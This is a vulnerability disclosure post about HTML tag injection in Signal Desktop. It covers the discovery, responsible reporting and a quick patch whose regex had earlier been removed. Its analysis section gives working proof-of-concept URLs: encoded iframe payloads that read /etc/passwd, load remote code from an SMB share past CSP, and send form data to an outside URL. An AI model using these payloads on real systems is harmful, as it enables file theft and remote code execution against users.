Windows Linux Signal-desktop – HTML tag injection

Authors:Multiple             Risk:High

CVE:NO                      0day:HTML tag injection

0day -id:0DAY-176181         Date:2018-05-15

Description

it’s been reported). He was using the Signal add-on for Chrome. Javier and I were using the desktop version, based on the insecureelectron framework. As I was reading, something caught my attention: an icon was showing next to the URL, as a “picture not found” icon.

I jumped from my chair and warned: “your XSS is triggered in signal-desktop!!”. Javier confirmed the finding and Alfredo was astounded: he couldn’t believe it. Later on, we confirmed the vuln with different people and in different platforms, such as Linux and Windows (and for sure it works in MacOS).

The critical thing here was that it didn’t required any interaction form the victim, other than simply being in the conversation. Anyone can initiate a conversation in Signal, so the attacker just needs to send a specially crafted URL to pwn the victim without further action. And it is platform independent!

We tried different kinds of HTML elements: img, form, script, object, frame, framset, iframe, sound, video (this last two where funny). They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. However, to abuse this vuln, we could:

  • crash the app with repeated and specially crafted URLs, obtaining segmentation fault/DoS (Alfredo’s app crashed several times but mine didn’t, so we couldn’t reproduce it)
  • send a crafted image in base64 format (we didn’t carry on with this)
  • send a file/phish and execute it with <iframe src=”…”></iframe>
  • have fun with <img>, <audio> and <video> 🙂

Inside iframes, everything was possible, even loading code from an SMB share!. This enables an atacker to execute remote code without caring about CSP. Juliano worked on this with Alfredo, along with trying to get a manageable segmentation fault.

Analysis

Show the user’s /etc/passwd content (or any other file):

http://hacktheplanet/?p=%3Ciframe%20src="/etc/passwd"%3E%3C/iframe%3E%20PWONED

Include and execute a remote JavaScript file (for Windows clients):

http://hacktheplanet/?p=%3d%3Ciframe%20src=\\DESKTOP-XXXXX\Temp\rce.html%3E
 Load signal inside signal (this may crash):

http://hacktheplanet/?p=%3Ciframe%20src="background.html"%3E%3C/iframe%3E%20PWONED
 Show message in an iframe:

http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E
 Play an audio file (you’ll hear a dog bark if you have gnome desktop or derived):

http://hacktheplanet/?p=%3Caudio%20autoplay%20src="/usr/share/sounds/gnome/default/alerts/bark.ogg"%20type="audio/ogg"%3E%3C/audio%3E

Play a video file (you’ll see a how-to configure dual monitor if you have gnome desktop or derived):

http://hacktheplanet/?p=%3Cvideo%20autoplay%20loop%20src="/usr/share/help/C/gnome-help/figures/display-dual-monitors.webm"%20type="video/webm"%3E%3C/video%3E

Display a form, and send some data:

http://hacktheplanet/?p=%3Cform%20method='POST'%20action='https://some.real/url'%3E%3Cinput%20type='text'%20name='data'%20value='from_form'/%3E%3Cinput%20type='submit'/%3E%3C/form%3E

Note: most PoCs says “hacktheplanet” and “PWONED“, those are jokes for us 🙂

 

Responsibly, we contacted the Signal security team on Friday in the early afternoon. They confirmed and patched right away, publishing a new version in under 2 hours.

signal-desktop mishap

However, the patch caught my attention: it was a big regex and I was surprised how fast they wrote it. So I decided to check on the file’s history to observe since when it has been vulnerable and I found this wonderful mistake: the applied “patch” already existed, but was (accidentally?) removed in a commit on April 10th to fix an issue with linking (I guess the issue is back 😛 ). I’m still not convinced about that regex and I’m afraid someone might exploit it, specially those resourceful three-letter agencies…

Timeline

Advisory

Read the advisory here.

Credits

This vulnerability was found and researched by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor), with assistance from Javier Lorenzo Carlos Smaldone (@mis2centavos).

Leave a Reply